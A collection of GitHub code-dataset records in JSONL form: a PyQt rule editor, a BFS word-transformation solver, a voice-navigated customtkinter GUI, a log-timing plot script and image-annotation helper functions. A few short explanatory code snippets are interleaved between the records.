rule_component=rule_component_wrapper)\n EVENT_MANAGER.fire_event(new_event)\n\n def remove_rule(self):\n selected_index = 
self.rule_list_view.currentRow()\n selected_item = self.rule_list_view.takeItem(selected_index)\n selected_component = selected_item.component\n\n # remove rule from application context\n for comp in self.context['rules']:\n if comp == selected_component:\n self.context['rules'].remove(comp)\n break\n\n # fire event for removing rule\n new_event = Event('removed_rule',\n rule_component=selected_component)\n EVENT_MANAGER.fire_event(new_event)\n\n def select_rule(self):\n selected_item = self.rule_list_view.currentItem()\n if selected_item is not None:\n selected_component = selected_item.component\n\n # set field values\n self.rule_name_field.setText(selected_component.text)\n self.value_field.setText(str(selected_component.component.value))\n index = self.operator_list_view.findText(selected_component.component.operator)\n self.operator_list_view.setCurrentIndex(index)\n\n def update(self):\n self.rule_list_view.clear()\n for rule in self.context['rules']:\n widget_component = WidgetItemComponent(rule.text, rule)\n self.rule_list_view.addItem(widget_component)\n", "repo_name": "thagberg/phyte-engine", "sub_path": "phyte/tools/rule_definition_qt.py", "file_name": "rule_definition_qt.py", "file_ext": "py", "file_size_in_byte": 4536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "editor_qt.Editor", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGroupBox", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 20, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 24, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 25, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 27, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 27, "usage_type": "name"}, {"api_name": "engine.state.OP_MAP.keys", "line_number": 45, "usage_type": "call"}, {"api_name": "engine.state.OP_MAP", "line_number": 45, "usage_type": 
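The add_rule method above coerces the rule value to float and silently keeps the string when the cast fails. Factored out, the idea looks like this; the function name is mine.

def coerce_rule_value(text):
    """Return a float when the widget text is numeric, else the raw string."""
    try:
        return float(text)
    except ValueError:
        return text

assert coerce_rule_value("3.5") == 3.5
assert coerce_rule_value("alive") == "alive"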
"name"}, {"api_name": "engine.state.RuleComponent", "line_number": 61, "usage_type": "call"}, {"api_name": "common.Component", "line_number": 62, "usage_type": "call"}, {"api_name": "common.WidgetItemComponent", "line_number": 63, "usage_type": "call"}, {"api_name": "event.Event", "line_number": 71, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER.fire_event", "line_number": 73, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER", "line_number": 73, "usage_type": "name"}, {"api_name": "event.Event", "line_number": 87, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER.fire_event", "line_number": 89, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER", "line_number": 89, "usage_type": "name"}, {"api_name": "common.WidgetItemComponent", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "33639489869", "text": "from collections import deque\n\n\ndef solution(begin, target, words):\n answer = 0\n\n if target not in words:\n return answer\n words.insert(0, begin)\n graph = [[] for _ in range(len(words))]\n for i in range(len(words)):\n for j in range(i+1, len(words)):\n if abcCompare(words[i], words[j]):\n graph[i].append(j)\n graph[j].append(i)\n d1 = deque()\n visited = [0] * len(words)\n d1.append(0)\n visited[0] = 0\n\n while True:\n if not d1:\n answer = 0\n break\n a = d1.popleft()\n\n if words[a] == target:\n answer = visited[a]\n break\n\n for i in graph[a]:\n if not visited[i]:\n d1.append(i)\n visited[i] = visited[a] + 1\n\n return answer\n\n\ndef abcCompare(a, b):\n cnt = 0\n for i in range(len(a)):\n if a[i] == b[i]:\n cnt = cnt + 1\n if cnt == len(a) - 1:\n return True\n else:\n return False", "repo_name": "tfer2442/myAlgorithm", "sub_path": "프로그래머스/lv3/43163. 단어 변환/단어 변환.py", "file_name": "단어 변환.py", "file_ext": "py", "file_size_in_byte": 1005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "21650894362", "text": "import customtkinter as ctk\nimport speech_recognition as sr\nimport pygame\nimport threading\nimport time\n\n\nroot = ctk.CTk()\nroot.geometry('500x400')\nroot.title('practice')\nctk.set_appearance_mode(\"light\")\nctk.set_default_color_theme(\"blue\")\n\nr = sr.Recognizer()\npygame.mixer.init()\n\n\ndef record_audio(ask=False, location=False):\n\n with sr.Microphone() as source:\n\n audio = r.listen(source, timeout=5, phrase_time_limit=7)\n voice_data = ''\n try:\n voice_data = r.recognize_google(\n audio, language='en-US')\n print(voice_data)\n except sr.UnknownValueError:\n\n pygame.mixer.music.load(\"sounds/soryididnotget2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(4)\n\n pygame.mixer.music.load(\"sounds/speak2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(3)\n\n voice_data = record_audio()\n indicate(voice_data)\n\n except sr.RequestError:\n\n pygame.mixer.music.load(\"sounds/spechservicedown2.wav\")\n pygame.mixer.music.play(loops=0)\n exit()\n return voice_data\n\n\ndef home_page():\n home_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(home_frame, text=\"laa home\", font=('Bold', 24))\n lb.pack()\n\n home_frame.pack(pady=20)\n\n\ndef menu_page():\n menu_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(menu_frame, text=\"laa menu\", font=('Bold', 24))\n lb.pack()\n\n menu_frame.pack(pady=20)\n\n\ndef contactas_page():\n contact_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(contact_frame, text=\"laa contact us\", font=('Bold', 24))\n 
lb.pack()\n\n contact_frame.pack(pady=20)\n\n\ndef about_page():\n about_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(about_frame, text=\"laa about\", font=('Bold', 24))\n lb.pack()\n\n about_frame.pack(pady=20)\n\n\noption_frame = ctk.CTkFrame(root)\n\nhome_btn = ctk.CTkButton(option_frame, text=\"Home\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\nhome_btn.place(x=10, y=50)\n\nhome_indicate = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\nhome_indicate.place(x=3, y=50)\n\nmenu_btn = ctk.CTkButton(option_frame, text=\"menu\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\nmenu_btn.place(x=10, y=100)\n\nmenu_indicator = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\nmenu_indicator.place(x=3, y=100)\n\n\ncontactas = ctk.CTkButton(option_frame, text=\"contact\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\ncontactas.place(x=10, y=150)\n\ncontactas_indicator = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\ncontactas_indicator.place(x=3, y=150)\n\nabout_btn = ctk.CTkButton(option_frame, text=\"about\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\nabout_btn.place(x=10, y=200)\n\nabout_indicator = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\nabout_indicator.place(x=3, y=200)\n\n\noption_frame.pack(side=ctk.LEFT)\noption_frame.pack_propagate(False)\noption_frame.configure(width=150, height=400)\n\nmain_frame = ctk.CTkFrame(root, fg_color=(\"#c3c3c3\", \"#2d2d2d\"))\n\nmain_frame.pack(side=ctk.LEFT)\nmain_frame.pack_propagate(False)\nmain_frame.configure(height=400, width=500)\n\n\ndef hide_indi():\n home_indicate.configure(bg_color=\"#c3c3c3\")\n menu_indicator.configure(bg_color=\"#c3c3c3\")\n contactas_indicator.configure(bg_color=\"#c3c3c3\")\n about_indicator.configure(bg_color=\"#c3c3c3\")\n\n\ndef delete_pages():\n for frame in main_frame.winfo_children():\n frame.destroy()\n\n\ndef ind(lb, page):\n hide_indi()\n lb.configure(bg_color=\"#158aff\")\n delete_pages()\n page()\n voice_data = record_audio()\n indicate(voice_data)\n\n\ndef indicate(voice_data):\n if \"home\" in voice_data:\n ind(home_indicate, home_page)\n elif \"menu\" in voice_data:\n ind(menu_indicator, menu_page)\n elif \"contact us\" in voice_data:\n ind(contactas_indicator, contactas_page)\n elif \"about\" in voice_data:\n ind(about_indicator, about_page)\n else:\n pygame.mixer.music.load(\"sounds/soryididnotget2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(4)\n\n pygame.mixer.music.load(\"sounds/speak2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(3)\n\n voice_data = record_audio()\n indicate(voice_data)\n\n\ndef threads():\n voice_data = record_audio()\n indicate(voice_data)\n\n\nthreading.Thread(target=threads).start()\nroot.mainloop()\n", "repo_name": "Etsubsole/voice-based-email", "sub_path": "practice.py", "file_name": "practice.py", "file_ext": "py", "file_size_in_byte": 4680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "customtkinter.CTk", "line_number": 8, "usage_type": "call"}, {"api_name": "customtkinter.set_appearance_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "customtkinter.set_default_color_theme", "line_number": 12, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 14, "usage_type": "call"}, {"api_name": 
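The indicate function above routes recognized speech through an if/elif chain; a table-driven equivalent is sketched below. The page callables are placeholders, standing in for the CTk page builders in the original.

# Hypothetical routing table: keyword fragment -> page callback.
ROUTES = {
    "home": lambda: print("home page"),
    "menu": lambda: print("menu page"),
    "contact us": lambda: print("contact page"),
    "about": lambda: print("about page"),
}

def route(voice_data):
    for keyword, page in ROUTES.items():
        if keyword in voice_data:
            page()
            return True
    return False          # caller can re-prompt the user, as practice.py does

route("please open the menu")   # -> prints "menu page"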
"pygame.mixer.init", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 15, "usage_type": "attribute"}, {"api_name": "speech_recognition.Microphone", "line_number": 20, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "speech_recognition.RequestError", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "customtkinter.CTkFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 52, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 59, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 61, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 70, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 79, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 87, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 91, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 95, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 99, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 104, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 108, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 112, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 116, "usage_type": "call"}, {"api_name": "customtkinter.LEFT", "line_number": 121, "usage_type": "attribute"}, {"api_name": "customtkinter.CTkFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "customtkinter.LEFT", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 164, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 165, "usage_type": "call"}, {"api_name": 
"pygame.mixer.music.load", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 168, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 169, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 180, "usage_type": "call"}]} +{"seq_id": "19604283058", "text": "#!/usr/bin/env python2.7\n\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import rcParams, cm\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom time import strptime, time, mktime\nfrom math import floor \n\nflog = open('/local/snarayan/logs/flask.log','r')\n\nBIN = 3600\ns2h = 1./3600\napis = ['start', 'done', 'query', 'clean','requestdata']\ndata = {'N':[],\n 't':[]}\nfor a in apis:\n data[a] = []\n\ndef get_line():\n i = 0\n while True:\n# if i == 100:\n# raise StopIteration \n line = next(flog).strip()\n i += 1\n yield line\n\nget = get_line()\n\nt = None \ntry:\n while True:\n line = next(get)\n if not any([line.startswith('condor_'+a+' start') for a in apis]):\n continue \n _ = next(get) # data line\n line2 = next(get)\n if not line2.startswith(line.split()[0]+' took'):\n continue \n try:\n line_ = line.split(': ')[1].split(' ')[0]\n t_ = mktime(strptime(line_, '%Y%m%d:%H:%M:%S'))\n except Exception as e:\n t_ = t \n raise e\n if t is None or t_ > t + BIN:\n t = t_\n data['t'].append(t)\n data['N'].append(0)\n for a in apis:\n data[a].append(0)\n data['N'][-1] += 1\n a = line.split(' ')[0].replace('condor_','')\n data[a][-1] += float(line2.split(' ')[2])\nexcept StopIteration:\n pass\n\nfor k,v in data.iteritems():\n data[k] = np.array(v)\n\ndata['t'] -= time()\ndata['t'] *= s2h \nfor a in apis:\n data[a] /= data['N']\n\nfig, ax1 = plt.subplots()\nax1.plot(data['t'], data['N'], 'darkgrey')\nax1.set_xlabel('Time [H]')\nax1.set_ylabel('Number of queries / Hour', color='darkgrey')\n#ax1.set_xscale('symlog')\nax1.tick_params('y', colors='darkgrey')\n\nax2 = ax1.twinx()\nfor a in apis:\n# if a == 'clean':\n# continue\n ax2.semilogy(data['t'], data[a], label=a)\nax2.set_ylabel('Average query time [s]')\n\nplt.legend(loc='best', fancybox=True)\nfig.tight_layout()\n\nout = '/home/snarayan/public_html/figs/thesis/bird_watcher'\nplt.savefig(out+'.png', dpi=200)\nplt.savefig(out+'.pdf')\n", "repo_name": "sidnarayanan/flask_server", "sub_path": "log_analysis/progress.py", "file_name": "progress.py", "file_ext": "py", "file_size_in_byte": 2139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 44, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "69920044354", "text": "\"\"\"\nHelper API\n\"\"\"\n\nimport argparse\nimport csv\nimport pickle\nimport os\nimport sys\nimport random\nimport math\nimport re\nimport time\nimport wget\nimport numpy as np\nfrom PIL import Image\nimport cv2\nimport glob\nfrom shutil import copyfile\nimport collections\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm_notebook as tqdm\nimport parallel \nimport concurrent.futures\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n\ndef get_fid(image_path):\n return os.path.basename(image_path).split('.')[0]\n\ndef process_labels_from_csv_input(prefix='data/raw', \n labels_csv_fname_list=['class-descriptions-boxable.csv', \n 'class-descriptions.csv']):\n label_dict = {}\n # Process the labels info files and create a key value pair\n for flabel_csv in labels_csv_fname_list:\n with open(os.path.join(prefix, flabel_csv)) as f:\n rows = csv.reader(f)\n for row in rows:\n if row[0] in label_dict:\n #print('Label already exists: {}:{}, new label: {}:{}'.\n # format(row[0], label_dict[row[0]], row[0], row[1]))\n assert row[1] == label_dict[row[0]]\n label_dict[row[0]]=row[1]\n \n return label_dict\n \ndef process_raw_csv_input(prefix='data/raw', train_csv_fname = 'challenge-2018-train-vrd.csv', \n labels_csv_fname_list = ['class-descriptions-boxable.csv', 'class-descriptions.csv']):\n \"\"\"\n Process the labels from given label names and create three categories\n a. Entity\n b. Attribute\n c. Relationship\n \"\"\"\n \n label_dict = process_labels_from_csv_input(prefix, labels_csv_fname_list)\n \n # Process the training data and create x, y i.e x->(imageid, (bounding box data)) y->(label1,label2,relationship)\n label1_dict = collections.defaultdict(int)\n label2_dict = collections.defaultdict(int)\n relationship_dict = collections.defaultdict(int)\n xy_list = []\n missing_label_dict = {}\n ignore_header = True\n miss_count = 0\n with open(os.path.join(prefix, train_csv_fname)) as f:\n rows = csv.reader(f)\n for row in rows:\n miss = False\n if ignore_header:\n ignore_header = False\n continue\n x = (row[0], (row[3:11]))\n y = (row[1], row[2], row[11])\n if y[0] not in label_dict:\n if y[0] not in missing_label_dict:\n print('Label1 missing: {}'.format(y[0]))\n miss = True\n missing_label_dict[y[0]] = y[0]\n else:\n label1_dict[y[0]] += 1\n if y[1] not in label_dict:\n if y[1] not in missing_label_dict:\n print('Label2 missing: {}, label1 : {}, relation: {}'.format(y[1], label_dict[y[0]], row[11]))\n miss_count += 1\n miss = True\n missing_label_dict[y[1]] = y[1]\n else:\n label2_dict[y[1]] += 1\n relationship_dict[y[2]] += 1\n if miss is False:\n xy_list.append((x, y))\n print (\"Missing label count: {}\".format(miss_count)) \n return xy_list, (label1_dict, label2_dict, relationship_dict), label_dict\n\ndef get_data_dir_from_raw_single_dir(X_dict, prefix='data', dir_list=None, out_dir='processed'):\n X_fset = set()\n copy_prefix_dir = os.path.join(prefix, out_dir)\n for d in dir_list:\n copy_dir = os.path.join(os.getcwd(), os.path.join(copy_prefix_dir, d))\n os.makedirs(copy_dir, exist_ok=True)\n flist = glob.glob(os.path.join(os.path.join(prefix, d), '*.jpg'))\n for f in flist:\n fid = os.path.basename(f).split('.')[0]\n if fid in X_dict:\n dst_f = os.path.join(copy_dir, os.path.basename(f))\n X_fset.add(dst_f)\n X_dict[fid] = (X_dict[fid], dst_f)\n 
copyfile(os.path.join(os.getcwd(), f), dst_f)\n \n return X_fset\n\ndef get_data_from_dir_recursive(xy_list, prefix='data/processed', dir_input='raw'):\n \"\"\"\n Load the file path for each image id. The dictionary can only have image file path since\n a single image can have multiple labels i.e multiple y values.\n\n Example of entry in xy_list:\n Train data xy_list[0]: (\n ('fe58ec1b06db2bb7', ['0.005', '0.033125', '0.58', '0.62777776', \n '0.005', '0.033125', '0.58', '0.62777776']) , \n ('/m/04bcr3', '/m/083vt', 'is'))\n \"\"\"\n cwd = os.getcwd()\n xy_list_valid = [] # xy_list that has valid image files available\n X_id_to_file_dict = {} # id of the image to file dictionary\n def process_files(dir_path):\n flist = glob.glob(os.path.join(dir_path, '*.jpg'))\n print('Processing dir: {}, image count: {}'.format(dir_path, len(flist)))\n \n for f in flist:\n fid = os.path.basename(f).split('.')[0]\n if fid in X_id_to_file_dict:\n print ('Error id exists twice: {}-{}-{}'.format(fid, f, X_id_to_file_dict[fid]))\n continue\n else:\n X_id_to_file_dict[fid] = os.path.join(cwd, f)\n \n def helper(dir_input_full):\n l = next(os.walk(dir_input_full))[1]\n if len(l) == 0: \n return\n \n for d in l:\n dir_path = os.path.join(dir_input_full, d)\n process_files(dir_path)\n helper(dir_path)\n \n process_files(os.path.join(prefix, dir_input))\n helper(os.path.join(prefix, dir_input))\n \n for xy in xy_list:\n if xy[0][0] in X_id_to_file_dict:\n xy_list_valid.append(xy)\n\n return xy_list_valid, X_id_to_file_dict\n\ndef bounding_box_to_plt(image, b):\n \"\"\"\n Convert one bounding box data into what mathplotlib understands\n [XMin1, XMax1, YMin1, YMax1, XMin2, XMax2, YMin2, YMax2]\n ['0.005', '0.033125', '0.58', '0.62777776', '0.005', '0.033125', '0.58', '0.62777776']\n for: https://matplotlib.org/api/_as_gen/matplotlib.patches.Rectangle.html#matplotlib.patches.Rectangle\n \"\"\"\n xsize = image.shape[1]\n ysize = image.shape[0]\n xy = (int(float(b[0]) * xsize), int(float(b[2]) * ysize)) # (XMin1 * xsize, YMin1 * ysize)\n width = int(float(b[1]) * xsize) - xy[0] # XMax1 * xsize - XMin1 * xsize\n height = int(float(b[3]) * ysize) - xy[1] # YMax1 * ysize - Ymin * ysize \n return (xy, width, height)\n\ndef two_bounding_boxes_to_plt(image, b):\n \"\"\"\n Convert two bounding box data into what mathplotlib understands\n \"\"\"\n return [bounding_box_to_plt(image, b[0:4]), bounding_box_to_plt(image, b[4:len(b)])]\n \ndef show_images(images,titles=None, bounding_boxes_list=[]):\n \"\"\"Display a list of images\"\"\"\n n_ims = len(images)\n if titles is None: titles = ['(%d)' % i for i in range(1,n_ims + 1)]\n fig = plt.figure()\n n = 1\n \n for i in range(0, len(images)):\n image = images[i]\n title = \"None\"\n if titles is not None and len(titles) > i:\n title = titles[i]\n \n bounding_boxes = None\n if bounding_boxes_list is not None and len(bounding_boxes_list) > i:\n bounding_boxes = bounding_boxes_list[i]\n\n a = fig.add_subplot(1,n_ims,n) # Make subplot\n if len(image.shape) == 2 or image.shape[2] == 1: # Is image grayscale?\n plt.imshow(np.resize(image, (image.shape[0], image.shape[1])), interpolation=\"bicubic\", cmap=\"gray\") # Only place in this blog you can't replace 'gray' with 'grey'\n else:\n plt.imshow(image, interpolation=\"bicubic\")\n if bounding_boxes is not None:\n box1, box2 = two_bounding_boxes_to_plt(image, bounding_boxes)\n rect1 = patches.Rectangle((box1[0]),box1[1],box1[2],linewidth=2,edgecolor='y',facecolor='none')\n rect2 = 
patches.Rectangle((box2[0]),box2[1],box2[2],linewidth=2,edgecolor='g',facecolor='none')\n a.add_patch(rect1)\n a.add_patch(rect2)\n if titles is not None:\n a.set_title(title + ' {}x{}'.format(image.shape[0], image.shape[1]))\n n += 1\n fig.set_size_inches(np.array(fig.get_size_inches()) * n_ims)\n plt.axis('off')\n plt.show()\n \ndef show_given_images(xy_given_list, id_to_file_dict, label_dict):\n img_list = []\n label_list = []\n bounding_boxes_list = []\n for xy in xy_given_list:\n fid = xy[0][0]\n bounding_boxes_list.append(xy[0][1])\n y = xy[1]\n label1 = y[0]\n label2 = y[1]\n if label1 in label_dict:\n label1 = label_dict[label1]\n if label2 in label_dict:\n label2 = label_dict[label2]\n \n label_list.append('{} {} {}'.format(label1, y[2], label2))\n if fid not in id_to_file_dict:\n print ('Error could not find id: {} in id_to_file_dict'.format(fid))\n raise \n img_list.append(cv2.cvtColor(cv2.imread(id_to_file_dict[fid], cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB))\n print ('Label_list\" {}'.format(label_list))\n show_images(img_list, titles=label_list, bounding_boxes_list=bounding_boxes_list)\n \ndef show_random_images(xy_given_list, id_to_file_dict, label_dict, count=4):\n xy_rnd_idx_list = np.random.choice(len(xy_given_list), count, replace=False)\n xy_rnd_list = [ xy_given_list[x] for x in xy_rnd_idx_list]\n show_given_images(xy_rnd_list, id_to_file_dict, label_dict)\n return xy_rnd_list\n\ndef _resize_job_helper(kv_list, output_dir, xsize=514, ysize=343):\n out_list = []\n for k, v in kv_list:\n if v is None:\n out_list.append((k, v))\n continue\n try:\n if os.path.isfile(v) is False:\n print('Invalid file failed for {}'.format(v))\n out_list.append((k, v))\n continue\n except:\n print('Invalid file failed for {}'.format(v))\n raise\n out_file = os.path.join(output_dir, os.path.basename(v))\n \n # If the file exists then \n if os.path.isfile(out_file):\n out_list.append((k, out_file))\n continue\n \n resize_img = cv2.resize(cv2.imread(v, cv2.IMREAD_COLOR),(xsize, ysize))\n out_file = os.path.join(output_dir, os.path.basename(v))\n cv2.imwrite(out_file, resize_img)\n \n out_list.append((k, out_file))\n return out_list\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n \ndef resize_all(id_to_file_dict, prefix='data/processed', output_dir='resized_images', xsize=514, ysize=343, \n count=None):\n output_dir = os.path.join(os.getcwd(), os.path.join(prefix, output_dir))\n os.makedirs(output_dir, exist_ok=True)\n\n aprun = parallel.ParallelExecutor(n_jobs=7)\n \n chunked_list = list(chunks(list(id_to_file_dict.items()), int(len(id_to_file_dict.items())/8)))\n \n print ('chunk list size: {}'.format(len(chunked_list)))\n\n out_list = aprun(bar='tqdm')(delayed(_resize_job_helper)(kv_list, output_dir, xsize, ysize) \n for kv_list in chunked_list)\n ret_dict = dict()\n for l in out_list:\n for k, v in l:\n ret_dict[k] = v\n return ret_dict\n", "repo_name": "geek101/visual_relationship", "sub_path": "helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 11509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.basename", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "csv.reader", 
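bounding_box_to_plt above converts normalized [XMin, XMax, YMin, YMax] coordinates into the (xy, width, height) triple that matplotlib.patches.Rectangle expects. Here is the arithmetic in isolation, with a made-up box and image size:

def to_rect(box, xsize, ysize):
    """box = [xmin, xmax, ymin, ymax] in 0..1, as in the Open Images CSVs."""
    xy = (int(float(box[0]) * xsize), int(float(box[2]) * ysize))
    width = int(float(box[1]) * xsize) - xy[0]
    height = int(float(box[3]) * ysize) - xy[1]
    return xy, width, height

# A box covering the central half of a 640x480 image (illustrative values).
assert to_rect(['0.25', '0.75', '0.25', '0.75'], 640, 480) == ((160, 120), 320, 240)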
